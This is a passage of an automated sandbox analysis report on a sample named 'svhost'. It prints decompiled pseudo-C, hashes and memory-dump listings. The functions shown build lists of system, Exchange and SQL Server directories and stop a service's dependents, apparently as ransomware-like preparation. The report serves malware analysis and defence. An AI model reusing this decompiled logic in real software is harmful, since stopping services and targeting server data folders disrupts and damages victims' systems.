                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 39112B7760418143D614866ED9B45B7E7A5EBCF328F2C63FAD0826F758D222F945D500
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB28E5 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB28E5(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00EB146F(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                      0x00eb28f2
                                      0x00eb28f4
                                      0x00eb28f7
                                      0x00eb28fa
                                      0x00eb28fd
                                      0x00eb290e
                                      0x00eb2910
                                      0x00eb28ff
                                      0x00eb2903
                                      0x00eb290c
                                      0x00000000
                                      0x00000000
                                      0x00eb290c
                                      0x00eb2915

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2504916e9dbb32d5e81137e3abe5a7a96d5e8bc48755024bb8a79154df76512
                                      • Instruction ID: 45b9d3fed89689b63d9706020644feb940f5fc80a9af451e7233d77f424518d8
                                      • Opcode Fuzzy Hash: f2504916e9dbb32d5e81137e3abe5a7a96d5e8bc48755024bb8a79154df76512
                                      • Instruction Fuzzy Hash: 0EE08C32911228EBCB14DBC8C904D8BF3FCEB84B55F1100AABA05E3100C670DE00D7D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E67290 Relevance: 119.4, APIs: 44, Strings: 24, Instructions: 405COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E00E67290(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v16;
				signed int _v20;
				char _v21;
				intOrPtr _v28;
				char _v29;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v152;
				char _v176;
				char _v200;
				char _v224;
				char _v248;
				char _v272;
				char _v296;
				char _v320;
				char _v344;
				char _v368;
				char _v392;
				char _v416;
				char _v440;
				char _v464;
				char _v488;
				char _v512;
				char _v536;
				char _v560;
				char _v584;
				char _v608;
				char _v632;
				char _v656;
				char _v680;
				char _v704;
				char _v728;
				char _v752;
				char _v776;
				char _v800;
				char _v824;
				char _v848;
				char _v872;
				char _v896;
				char _v920;
				char _v944;
				char _v968;
				char _v992;
				char _v1016;
				char _v1040;
				char _v1064;
				char _v1088;
				signed int _t152;
				signed int _t153;
				signed int _t426;
				void* _t443;

				_t443 = __eflags;
				_t425 = __esi;
				_t424 = __edi;
				_t284 = __ebx;
				_push(0xffffffff);
				_push(0xec10f0);
				_push( *[fs:0x0]);
				_t152 =  *0xeef074; // 0x221cac15
				_t153 = _t152 ^ _t426;
				_v20 = _t153;
				_push(_t153);
				 *[fs:0x0] =  &_v16;
				_v28 = __ecx;
				E00E566A0(_v28);
				E00E566A0(_v28 + 0xc);
				_v29 = 0;
				E00E679C0(__ebx, _v28, __edi, __esi, "$");
				E00E57CD0(__ebx,  &_v56, __edi, __esi, _t443, L"ALLUSERSPROFILE");
				E00E61E50(_v28, E00E67CE0(__ebx, _v28, __edi, __esi,  &_v440,  &_v56));
				E00E57B40( &_v440);
				E00E57B40( &_v56);
				E00E57CD0(_t284,  &_v80, _t424, _t425, _t443, L"USERPROFILE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v464, E00E67CE0(_t284, _v28, _t424, _t425,  &_v488,  &_v80), L"\\AppData"));
				E00E57B40( &_v464);
				E00E57B40( &_v488);
				E00E57B40( &_v80);
				E00E57CD0(_t284,  &_v104, _t424, _t425, _t443, L"ProgramData");
				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v512,  &_v104));
				E00E57B40( &_v512);
				E00E57B40( &_v104);
				E00E57CD0(_t284,  &_v128, _t424, _t425, _t443, L"WINDIR");
				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v536,  &_v128));
				E00E57B40( &_v536);
				E00E57B40( &_v128);
				E00E57CD0(_t284,  &_v152, _t424, _t425, _t443, L"PROGRAMFILES(x86)");
				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v560,  &_v152));
				E00E57B40( &_v560);
				E00E57B40( &_v152);
				E00E57CD0(_t284,  &_v176, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v584, E00E67CE0(_t284, _v28, _t424, _t425,  &_v608,  &_v176), L"\\Program Files"));
				E00E57B40( &_v584);
				E00E57B40( &_v608);
				E00E57B40( &_v176);
				E00E57CD0(_t284,  &_v200, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v632, E00E67CE0(_t284, _v28, _t424, _t425,  &_v656,  &_v200), L"\\AppData"));
				E00E57B40( &_v632);
				E00E57B40( &_v656);
				E00E57B40( &_v200);
				E00E57CD0(_t284,  &_v224, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v680, E00E67CE0(_t284, _v28, _t424, _t425,  &_v704,  &_v224), L"\\Application Data"));
				E00E57B40( &_v680);
				E00E57B40( &_v704);
				E00E57B40( &_v224);
				E00E57CD0(_t284,  &_v248, _t424, _t425, _t443, 0xed8ec4);
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v728, E00E67CE0(_t284, _v28, _t424, _t425,  &_v752,  &_v248), 0xed8eb4));
				E00E57B40( &_v728);
				E00E57B40( &_v752);
				E00E57B40( &_v248);
				E00E57CD0(_t284,  &_v272, _t424, _t425, _t443, 0xee0bfc);
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v776, E00E67CE0(_t284, _v28, _t424, _t425,  &_v800,  &_v272), 0xedcd64));
				E00E57B40( &_v776);
				E00E57B40( &_v800);
				E00E57B40( &_v272);
				E00E57CD0(_t284,  &_v296, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v824, E00E67CE0(_t284, _v28, _t424, _t425,  &_v848,  &_v296), L"\\Users\\All Users"));
				E00E57B40( &_v824);
				E00E57B40( &_v848);
				E00E57B40( &_v296);
				E00E57CD0(_t284,  &_v320, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v872, E00E67CE0(_t284, _v28, _t424, _t425,  &_v896,  &_v320), L"\\Windows"));
				E00E57B40( &_v872);
				E00E57B40( &_v896);
				E00E57B40( &_v320);
				E00E57CD0(_t284,  &_v344, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v920, E00E67CE0(_t284, _v28, _t424, _t425,  &_v944,  &_v344), L"\\Program Files\\Microsoft\\Exchange Server"));
				E00E57B40( &_v920);
				E00E57B40( &_v944);
				E00E57B40( &_v344);
				E00E57CD0(_t284,  &_v368, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v968, E00E67CE0(_t284, _v28, _t424, _t425,  &_v992,  &_v368), L"\\Program Files (x86)\\Microsoft\\Exchange Server"));
				E00E57B40( &_v968);
				E00E57B40( &_v992);
				E00E57B40( &_v368);
				E00E57CD0(_t284,  &_v392, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v1016, E00E67CE0(_t284, _v28, _t424, _t425,  &_v1040,  &_v392), L"\\Program Files\\Microsoft SQL Server"));
				E00E57B40( &_v1016);
				E00E57B40( &_v1040);
				E00E57B40( &_v392);
				E00E57CD0(_t284,  &_v416, _t424, _t425, _t443, L"SYSTEMDRIVE");
				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v1064, E00E67CE0(_t284, _v28, _t424, _t425,  &_v1088,  &_v416), L"\\Program Files (x86)\\Microsoft SQL Server"));
				E00E57B40( &_v1064);
				E00E57B40( &_v1088);
				E00E57B40( &_v416);
				E00E678F0(_t284,  &_v21, _t424, _t425, E00E51650(_v28));
				E00E678F0(_t284,  &_v21, _t424, _t425, E00E51650(_v28 + 0xc));
				 *[fs:0x0] = _v16;
				return E00E89A35(_t284, _v20 ^ _t426,  &_v1064, _t424, _t425);
			}
























































                                      0x00e67290
                                      0x00e67290
                                      0x00e67290
                                      0x00e67290
                                      0x00e67293
                                      0x00e67295
                                      0x00e672a0
                                      0x00e672a7
                                      0x00e672ac
                                      0x00e672ae
                                      0x00e672b1
                                      0x00e672b5
                                      0x00e672bb
                                      0x00e672c1
                                      0x00e672cc
                                      0x00e672d3
                                      0x00e672de
                                      0x00e672eb
                                      0x00e67307
                                      0x00e67312
                                      0x00e6731a
                                      0x00e67327
                                      0x00e67358
                                      0x00e67363
                                      0x00e6736e
                                      0x00e67376
                                      0x00e67383
                                      0x00e6739f
                                      0x00e673aa
                                      0x00e673b2
                                      0x00e673bf
                                      0x00e673db
                                      0x00e673e6
                                      0x00e673ee
                                      0x00e673fe
                                      0x00e6741d
                                      0x00e67428
                                      0x00e67433
                                      0x00e67443
                                      0x00e67477
                                      0x00e67482
                                      0x00e6748d
                                      0x00e67498
                                      0x00e674a8
                                      0x00e674dc
                                      0x00e674e7
                                      0x00e674f2
                                      0x00e674fd
                                      0x00e6750d
                                      0x00e67541
                                      0x00e6754c
                                      0x00e67557
                                      0x00e67562
                                      0x00e67572
                                      0x00e675a6
                                      0x00e675b1
                                      0x00e675bc
                                      0x00e675c7
                                      0x00e675d7
                                      0x00e6760b
                                      0x00e67616
                                      0x00e67621
                                      0x00e6762c
                                      0x00e6763c
                                      0x00e67670
                                      0x00e6767b
                                      0x00e67686
                                      0x00e67691
                                      0x00e676a1
                                      0x00e676d5
                                      0x00e676e0
                                      0x00e676eb
                                      0x00e676f6
                                      0x00e67706
                                      0x00e6773d
                                      0x00e67748
                                      0x00e67753
                                      0x00e6775e
                                      0x00e6776e
                                      0x00e677a5
                                      0x00e677b0
                                      0x00e677bb
                                      0x00e677c6
                                      0x00e677d6
                                      0x00e6780d
                                      0x00e67818
                                      0x00e67823
                                      0x00e6782e
                                      0x00e6783e
                                      0x00e67875
                                      0x00e67880
                                      0x00e6788b
                                      0x00e67896
                                      0x00e678ab
                                      0x00e678c3
                                      0x00e678ce
                                      0x00e678e3

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$std::ios_base::good$Affinity::operator!=Concurrency::details::EnvironmentHardwareMutex_baseMutex_base::~_Variablestd::_
                                      • String ID: PROGRAMFILES(x86)$ProgramData$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$USERPROFILE$WINDIR$\AppData$\AppData$\Application Data$\Program Files$\Program Files (x86)\Microsoft SQL Server$\Program Files (x86)\Microsoft\Exchange Server$\Program Files\Microsoft SQL Server$\Program Files\Microsoft\Exchange Server$\Users\All Users$\Windows$hd.
                                      • API String ID: 2830044558-2025937393
                                      • Opcode ID: adf73313867445dd7de305e6ad7a30504376cdaba61f0329ba29f2a18519d157
                                      • Instruction ID: f540ea5b3cb252279b466944bbcfa1df19105cb6e0a7e3b91c3f334bda12e521
                                      • Opcode Fuzzy Hash: adf73313867445dd7de305e6ad7a30504376cdaba61f0329ba29f2a18519d157
                                      • Instruction Fuzzy Hash: A1F13D719541189BCB14FB60EDA3EEEB3BAAF14340F4065D9B54A72192DF306B98CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E63B30 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 197COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E00E63B30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed char* _a8, char _a12) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				char _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed char* _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				char _v116;
				char _v128;
				signed int _t100;
				signed int _t101;
				signed int _t116;
				void* _t130;
				void* _t147;
				intOrPtr _t151;
				signed int _t157;
				intOrPtr _t172;
				intOrPtr _t193;
				signed int _t205;
				void* _t206;
				void* _t207;
				signed int _t208;

				_t207 = __esi;
				_t206 = __edi;
				_t147 = __ebx;
				_push(0xffffffff);
				_push(0xec0f50);
				_push( *[fs:0x0]);
				_t100 =  *0xeef074; // 0x221cac15
				_t101 = _t100 ^ _t208;
				_v20 = _t101;
				_push(_t101);
				 *[fs:0x0] =  &_v16;
				_v76 = __ecx;
				_v80 = 0;
				E00E57D70( &_v44);
				_v8 = 0;
				E00E57D70( &_v68);
				_v8 = 1;
				_v92 = _a8;
				_t151 = _v76;
				_t194 =  *(_t151 + 0x48) & 0x000000ff;
				if(( *(_t151 + 0x48) & 0x000000ff) == 0) {
					_v100 = 0;
					_v96 = 0;
					_t193 = _v76;
					_t194 = _v100;
					 *(_t193 + 0x40) = _v100;
					 *((intOrPtr*)(_t193 + 0x44)) = _v96;
				}
				E00E591C0( &_v44, _t206, _t207, 8, 0);
				 *(_v76 + 0x4c) = 0;
				while(1) {
					_t28 =  &_a12; // 0xe62a27
					if(_a8 ==  *_t28) {
						break;
					}
					_v84 = E00E5A440(E00E64220( &_v44,  &_v104));
					_t116 = E00E57A20( &_v44);
					_t39 =  &_a12; // 0xe62a27
					_v88 = E00E61310( *((intOrPtr*)(_v76 + 4)), _v76 + 0x40, _a8,  *_t39,  &_a8, _v84, _v84 + _t116 * 2,  &_v72);
					if(_v88 < 0) {
						L22:
						_t172 = _v76;
						_t194 =  *(_t172 + 0x4a) & 0x000000ff;
						_t217 =  *(_t172 + 0x4a) & 0x000000ff;
						if(( *(_t172 + 0x4a) & 0x000000ff) == 0) {
							E00E60E80( &_v128, "bad conversion");
							E00EA0C81( &_v128, 0xeedb3c);
							goto L25;
						} else {
							E00E57DE0(_t147, _a4, _t206, _t207, _t217, _v76 + 0x28);
							_v80 = _v80 | 0x00000001;
							_v8 = 0;
							E00E57B40( &_v68);
							_v8 = 0xffffffff;
							E00E57B40( &_v44);
						}
					} else {
						if(_v88 <= 1) {
							__eflags = _v84 - _v72;
							if(_v84 >= _v72) {
								_t130 = E00E57A20( &_v44);
								__eflags = _t130 - 0x10;
								if(_t130 >= 0x10) {
									__eflags =  *(_v76 + 0x4a) & 0x000000ff;
									if(__eflags == 0) {
										E00E60E80( &_v116, "bad conversion");
										E00EA0C81( &_v116, 0xeedb3c);
										goto L16;
									} else {
										_t194 = _v76 + 0x28;
										E00E57DE0(_t147, _a4, _t206, _t207, __eflags, _v76 + 0x28);
										_v80 = _v80 | 0x00000001;
										_v8 = 0;
										E00E57B40( &_v68);
										_v8 = 0xffffffff;
										E00E57B40( &_v44);
									}
								} else {
									E00E591C0( &_v44, _t206, _t207, 8, 0);
									goto L16;
								}
							} else {
								asm("lfence");
								E00E64290(_t147,  &_v68, _t206, _t207, _v84, _v72 - _v84 >> 1);
								L16:
								goto L25;
							}
						} else {
							if(_v88 == 3) {
								while(1) {
									_t72 =  &_a12; // 0xe62a27
									__eflags = _a8 -  *_t72;
									if(_a8 ==  *_t72) {
										break;
									}
									E00E63180(_t147,  &_v68, _t206, _t207,  *_a8 & 0xff);
									_t205 =  &(_a8[1]);
									__eflags = _t205;
									_a8 = _t205;
								}
								L25:
								_t194 = _a8 - _v92;
								__eflags = _t194;
								 *(_v76 + 0x4c) = _t194;
								continue;
							} else {
								goto L22;
							}
						}
					}
					L27:
					 *[fs:0x0] = _v16;
					_t98 =  &_v20; // 0xe62a27
					return E00E89A35(_t147,  *_t98 ^ _t208, _t194, _t206, _t207);
				}
				E00E57BA0(_a4,  &_v68);
				_t157 = _v80 | 0x00000001;
				__eflags = _t157;
				_v80 = _t157;
				_v8 = 0;
				E00E57B40( &_v68);
				_v8 = 0xffffffff;
				E00E57B40( &_v44);
				goto L27;
			}
































                                      0x00e63b30
                                      0x00e63b30
                                      0x00e63b30
                                      0x00e63b33
                                      0x00e63b35
                                      0x00e63b40
                                      0x00e63b44
                                      0x00e63b49
                                      0x00e63b4b
                                      0x00e63b4e
                                      0x00e63b52
                                      0x00e63b58
                                      0x00e63b5b
                                      0x00e63b65
                                      0x00e63b6a
                                      0x00e63b74
                                      0x00e63b79
                                      0x00e63b80
                                      0x00e63b83
                                      0x00e63b86
                                      0x00e63b8c
                                      0x00e63b90
                                      0x00e63b93
                                      0x00e63b96
                                      0x00e63b99
                                      0x00e63b9c
                                      0x00e63ba2
                                      0x00e63ba2
                                      0x00e63bac
                                      0x00e63bb4
                                      0x00e63bc9
                                      0x00e63bcc
                                      0x00e63bcf
                                      0x00000000
                                      0x00000000
                                      0x00e63be8
                                      0x00e63bf2
                                      0x00e63c06
                                      0x00e63c20
                                      0x00e63c27
                                      0x00e63d11
                                      0x00e63d11
                                      0x00e63d14
                                      0x00e63d18
                                      0x00e63d1a
                                      0x00e63d5e
                                      0x00e63d6c
                                      0x00000000
                                      0x00e63d1c
                                      0x00e63d26
                                      0x00e63d31
                                      0x00e63d34
                                      0x00e63d3b
                                      0x00e63d40
                                      0x00e63d4a
                                      0x00e63d4f
                                      0x00e63c2d
                                      0x00e63c31
                                      0x00e63c45
                                      0x00e63c48
                                      0x00e63c67
                                      0x00e63c6c
                                      0x00e63c6f
                                      0x00e63c86
                                      0x00e63c88
                                      0x00e63ccf
                                      0x00e63cdd
                                      0x00000000
                                      0x00e63c8a
                                      0x00e63c8d
                                      0x00e63c94
                                      0x00e63c9f
                                      0x00e63ca2
                                      0x00e63ca9
                                      0x00e63cae
                                      0x00e63cb8
                                      0x00e63cbd
                                      0x00e63c71
                                      0x00e63c78
                                      0x00000000
                                      0x00e63c78
                                      0x00e63c4a
                                      0x00e63c4a
                                      0x00e63c5d
                                      0x00e63ce2
                                      0x00000000
                                      0x00e63ce2
                                      0x00e63c33
                                      0x00e63c37
                                      0x00e63cf2
                                      0x00e63cf5
                                      0x00e63cf5
                                      0x00e63cf8
                                      0x00000000
                                      0x00000000
                                      0x00e63d08
                                      0x00e63cec
                                      0x00e63cec
                                      0x00e63cef
                                      0x00e63cef
                                      0x00e63d71
                                      0x00e63bc0
                                      0x00e63bc0
                                      0x00e63bc6
                                      0x00000000
                                      0x00e63c3d
                                      0x00000000
                                      0x00e63c3d
                                      0x00e63c37
                                      0x00e63c31
                                      0x00e63da9
                                      0x00e63dac
                                      0x00e63db4
                                      0x00e63dc1
                                      0x00e63dc1
                                      0x00e63d7d
                                      0x00e63d85
                                      0x00e63d85
                                      0x00e63d88
                                      0x00e63d8b
                                      0x00e63d92
                                      0x00e63d97
                                      0x00e63da1
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$codecvt
                                      • String ID: '*$'*$bad conversion
                                      • API String ID: 882727733-1417368232
                                      • Opcode ID: f8e28995a02dacca22654ec48ae5a7e673fde936aa4c7c0862b6bd09a90d84a0
                                      • Instruction ID: 275c3495373549b4376d8a30f8fdb67368bea0987744062c237007a93befdbf9
                                      • Opcode Fuzzy Hash: f8e28995a02dacca22654ec48ae5a7e673fde936aa4c7c0862b6bd09a90d84a0
                                      • Instruction Fuzzy Hash: 67815D31A04248DFCB04DFA4D891AEEFBB1FF44354F24A55DE816BB291DB31AA46CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6EF60 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 159COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E00E6EF60(intOrPtr __ecx, void* __edx, void* _a4, void* _a8, char _a12) {
				int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct _SERVICE_STATUS _v72;
				int _v76;
				void* _v80;
				signed int _v84;
				void* _v88;
				long _v92;
				intOrPtr _v96;
				void _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				signed int _t63;
				int* _t83;
				long _t84;
				void* _t87;
				void* _t109;
				void* _t114;
				signed int _t117;
				void* _t118;
				void* _t119;

				_push(0xfffffffe);
				_push(0xeeaa58);
				_push(0xebf9ba);
				_push( *[fs:0x0]);
				_t119 = _t118 + 0xffffff90;
				_t62 =  *0xeef074; // 0x221cac15
				_v12 = _v12 ^ _t62;
				_t63 = _t62 ^ _t117;
				_v32 = _t63;
				_push(_t63);
				_t4 =  &_v20; // 0xe6ee48
				 *[fs:0x0] = _t4;
				_v96 = __ecx;
				if(_a8 != 0) {
					_v76 = 0;
					_v36 = 0;
					_v80 = 0;
					_v72 = 0;
					_v68 = 0;
					_v64 = 0;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0;
					_v92 = GetTickCount();
					if(EnumDependentServicesW(_a8, 1, _v80, 0,  &_v76,  &_v36) == 0) {
						if(GetLastError() == 0xea) {
							_t104 = _v76;
							_v80 = HeapAlloc(GetProcessHeap(), 8, _v76);
							if(_v80 != 0) {
								_v8 = 0;
								_t104 = _v76;
								if(EnumDependentServicesW(_a8, 1, _v80, _v76,  &_v76,  &_v36) != 0) {
									_v84 = 0;
									while(_v84 < _v36) {
										memcpy( &_v132,  &(_v80[_v84]), 9 << 2);
										_t119 = _t119 + 0xc;
										_t104 = _a4;
										_v88 = OpenServiceW(_a4, _v132, 0x24);
										if(_v88 != 0) {
											_v8 = 1;
											if(ControlService(_v88, 1,  &_v72) != 0) {
												while(_v68 != 1) {
													_t50 =  &_a12; // 0xe6ee48
													Sleep( *_t50);
													_t83 =  &_v76;
													__imp__QueryServiceStatusEx(_v88, 0,  &_v72, 0x24, _t83);
													if(_t83 != 0) {
														if(_v68 != 1) {
															_t84 = GetTickCount();
															_t56 =  &_a12; // 0xe6ee48
															if(_t84 - _v92 <=  *_t56) {
																continue;
															} else {
															}
														} else {
														}
													} else {
													}
													goto L25;
												}
											} else {
											}
											L25:
											_v8 = 0;
											E00E6F121();
											_t104 = _v84 + 1;
											_v84 = _v84 + 1;
											continue;
										} else {
										}
										goto L27;
									}
								} else {
								}
								L27:
								_v8 = 0xfffffffe;
								E00E6F13F();
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
				_t59 =  &_v20; // 0xe6ee48
				 *[fs:0x0] =  *_t59;
				_pop(_t109);
				_pop(_t114);
				_pop(_t87);
				return E00E89A35(_t87, _v32 ^ _t117, _t104, _t109, _t114);
			}






































                                      0x00e6ef63
                                      0x00e6ef65
                                      0x00e6ef6a
                                      0x00e6ef75
                                      0x00e6ef76
                                      0x00e6ef79
                                      0x00e6ef7e
                                      0x00e6ef81
                                      0x00e6ef83
                                      0x00e6ef89
                                      0x00e6ef8a
                                      0x00e6ef8d
                                      0x00e6ef93
                                      0x00e6ef9a
                                      0x00e6efa1
                                      0x00e6efa8
                                      0x00e6efaf
                                      0x00e6efb8
                                      0x00e6efbb
                                      0x00e6efbe
                                      0x00e6efc1
                                      0x00e6efc4
                                      0x00e6efc7
                                      0x00e6efca
                                      0x00e6efcd
                                      0x00e6efd0
                                      0x00e6efd9
                                      0x00e6eff8
                                      0x00e6f00f
                                      0x00e6f016
                                      0x00e6f029
                                      0x00e6f030
                                      0x00e6f037
                                      0x00e6f046
                                      0x00e6f05c
                                      0x00e6f063
                                      0x00e6f075
                                      0x00e6f090
                                      0x00e6f090
                                      0x00e6f098
                                      0x00e6f0a2
                                      0x00e6f0a9
                                      0x00e6f0b0
                                      0x00e6f0c9
                                      0x00e6f0cd
                                      0x00e6f0d3
                                      0x00e6f0d7
                                      0x00e6f0dd
                                      0x00e6f0ed
                                      0x00e6f0f5
                                      0x00e6f0fd
                                      0x00e6f101
                                      0x00e6f10a
                                      0x00e6f10d
                                      0x00000000
                                      0x00000000
                                      0x00e6f10f
                                      0x00000000
                                      0x00e6f0ff
                                      0x00000000
                                      0x00e6f0f7
                                      0x00000000
                                      0x00e6f0f5
                                      0x00000000
                                      0x00e6f0cb
                                      0x00e6f113
                                      0x00e6f113
                                      0x00e6f11a
                                      0x00e6f06f
                                      0x00e6f072
                                      0x00000000
                                      0x00000000
                                      0x00e6f0ab
                                      0x00000000
                                      0x00e6f0a9
                                      0x00000000
                                      0x00e6f05e
                                      0x00e6f131
                                      0x00e6f131
                                      0x00e6f138
                                      0x00000000
                                      0x00e6f032
                                      0x00000000
                                      0x00e6f011
                                      0x00000000
                                      0x00e6effa
                                      0x00000000
                                      0x00e6ef9c
                                      0x00e6f153
                                      0x00e6f156
                                      0x00e6f15e
                                      0x00e6f15f
                                      0x00e6f160
                                      0x00e6f16e

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00E6EFD3
                                      • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E6EFF0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
